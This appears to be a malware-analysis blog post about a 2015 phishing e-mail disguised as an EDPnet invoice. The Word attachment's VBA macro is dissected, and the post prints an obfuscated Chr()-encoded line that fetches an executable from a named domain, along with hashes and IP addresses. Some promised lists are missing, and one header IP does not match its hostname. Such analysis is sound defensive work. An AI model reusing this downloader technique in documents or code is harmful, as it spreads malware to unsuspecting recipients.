It seemed a very legitimate e-mail actually coming from EDPnet although the IP address of the sender gave it away that the sender was from Brazil:
Received: from user-186-237-165-130.inova.net.br (126.96.36.199)
Date: Tue, 9 Jun 2015 04:00:46 -0200
Subject: Uw edpnet factuur 2015061035
As attachment there was a word document with a macro contained in it. The MD5 of the attachment was 8ca62e90fea72d491a3933597b51d19f. At the time of analysis there were only 2 AV's on virustotal that recognized it. The first submission was at 2015-06-09 07:20:08 UTC and the codepage is Cyrillic.
I used OfficeMalScanner by Frank Boldewin to dump out the macro code:
C:\>OfficeMalScanner.exe 3267298_2015061035.doc info
Interestingly it dumped out 5 files:
If InStr(1, d.Application.OperatingSystem, "NT") Then
' Use this line with Windows NT:
winDrive = Left(Environ("WINDIR"), 3)
Shell winDrive & "Program Files\Windows NT\dialer.exe", 1
' Use this line with Windows 95/98:
winFolder = Environ("WINDIR")
Shell winFolder & "\dialer.exe", 1
As you can make up from the comments, it is code that dates from a while back.
In Module3 we have again very nicely documented code written in English, the coding style resembles the code from Module1.
Module4 and Module5 have clean code but contains the malicious code. It uses the same principle as other malware. It starts with the creation of an XMLHTTP-object and then fetches the malware. The code for fetching the malware is:
CallByName HOPPOJJ2233, Chr(79) & Chr(112) & "e" & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), Chr(104) & "t" & "t" & Chr(112) & Chr(58) & "/" & Chr(47) & "p" & Chr(122) & "i" & "e" & Chr(110) & Chr(116) & Chr(97) & "r" & Chr(97) & Chr(46) & Chr(112) & Chr(108) & Chr(47) & Chr(52) & Chr(50) & "/" & Chr(49) & Chr(49) & ".e" & Chr(120) & Chr(101), False
It translates to a GET of hxxp://pzientara.pl/42/11.exe. Unfortunately I didn't get my hands on this executable but when analyzing the log files interestingly the victims used the same url (since they received the same Word document) but downloaded it from different IP addresses in a time span of less than 30 minutes. The IP addresses where:
Analysis of the IP 188.8.131.52 in VirusTotal's Passive DNS gives us no result for hxxp://pzientara.pl/42/11.exe.
Finally the IP address 184.108.40.206 in VirusTotal's Passive DNS did not give any results for hxxp://pzientara.pl/42/11.exe either.
As last idea I wanted to have a look at the geographical spreading of the C&C servers. We see that is in the 220.127.116.11 is in USA, 18.104.22.168 is in Russia and 22.214.171.124 is in France.